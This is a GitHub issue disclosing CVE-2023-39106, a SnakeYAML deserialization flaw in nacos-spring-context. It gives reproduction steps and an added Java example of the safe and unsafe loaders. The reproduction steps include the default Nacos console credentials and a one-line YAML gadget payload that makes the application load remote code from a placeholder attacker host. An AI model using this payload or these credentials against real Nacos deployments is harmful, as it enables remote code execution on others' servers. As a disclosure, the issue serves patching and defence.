CVE-2023-39106: YAML deserialization vulnerability leads to RCE · Issue #314 · nacos-group/nacos-spring-project
An issue in Nacos Group Nacos Spring Project v1.1.1 and earlier allows a remote attacker to execute arbitrary code via the SnakeYAML Constructor() component.
Issue Description
SnakeYAML's Constructor() class is used in the nacos-spring-context component, but it does not restrict the types that can be instantiated during deserialization.
Describe what happened (or what feature you want)
Deserializing YAML content provided by an attacker can lead to remote code execution.
So when a Spring Framework project uses nacos-spring-context as a dependency, anyone who can add a malicious config entry on the Nacos server can easily achieve RCE.
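The root cause above is the constructor choice. As an added example (not code from this report or from the Nacos project; the class name and the sample document are constructed for illustration), the following shows the vulnerable SnakeYAML pattern next to the hardened SafeConstructor form, which rejects any global `!!` class tag before an object is built:

```java
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.Constructor;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

import java.util.Map;

/** Hypothetical loader for config pulled from a remote config server (illustrative, not project code). */
public final class UntrustedYamlConfig {

    // Constructed sample: a global "!!" tag naming a JVM class. The class here is harmless,
    // but the report's !!javax.script.ScriptEngineManager chain relies on the same mechanism.
    static final String SAMPLE = "test: !!java.lang.String [ \"constructed sample\" ]\n";

    /** Vulnerable pattern: Constructor resolves any !!tag to a class and instantiates it. */
    static Object loadUnsafe(String yaml) {
        return new Yaml(new Constructor()).load(yaml);
    }

    /** Hardened pattern: SafeConstructor only builds standard YAML types (maps, lists, scalars). */
    @SuppressWarnings("unchecked")
    static Map<String, Object> loadSafe(String yaml) {
        // SnakeYAML 1.x no-arg form; on SnakeYAML 2.x use new SafeConstructor(new LoaderOptions()).
        Yaml loader = new Yaml(new SafeConstructor());
        return (Map<String, Object>) loader.load(yaml);
    }

    public static void main(String[] args) {
        Object unsafe = loadUnsafe(SAMPLE);
        // Prints java.lang.String: the default Constructor instantiated the tagged class.
        System.out.println("Constructor instantiated: "
                + ((Map<?, ?>) unsafe).get("test").getClass().getName());

        try {
            loadSafe(SAMPLE);
            System.out.println("unexpected: global tag accepted");
        } catch (YAMLException e) {
            // ConstructorException: "could not determine a constructor for the tag ..."
            System.out.println("SafeConstructor rejected it: " + e.getMessage().split("\n")[0]);
        }
    }
}
```

The same rejection applies to every global tag, so config fetched from a server the application does not fully control should only ever pass through the SafeConstructor path.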
Describe what you expected to happen
The YAML content should be rejected as unsupported instead of being deserialized into arbitrary objects.
How to reproduce it (as minimally and precisely as possible)
Create an empty Spring Framework project and add nacos-spring-context as a dependency.
Add the code below, which, as the documentation describes, sets up a NacosPropertySource:

+import com.alibaba.nacos.api.config.ConfigType;
+import com.alibaba.nacos.spring.context.annotation.config.NacosPropertySource;

 @SpringBootApplication
+@NacosPropertySource(dataId = "example.yaml", type=ConfigType.YAML, autoRefreshed=true)
 public class Application {
     public static void main(String[] args) { ......
Now log in to the Nacos config server (by default at http://127.0.0.1:8848 with the credentials nacos/nacos), then edit example.yaml and add the single config line below:
test: !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL [ “http://evilsite.com” ]]]]
Tell us your environment
spring-framework 2.7.8
nacos-spring-context 1.1.1
Anything else we need to know?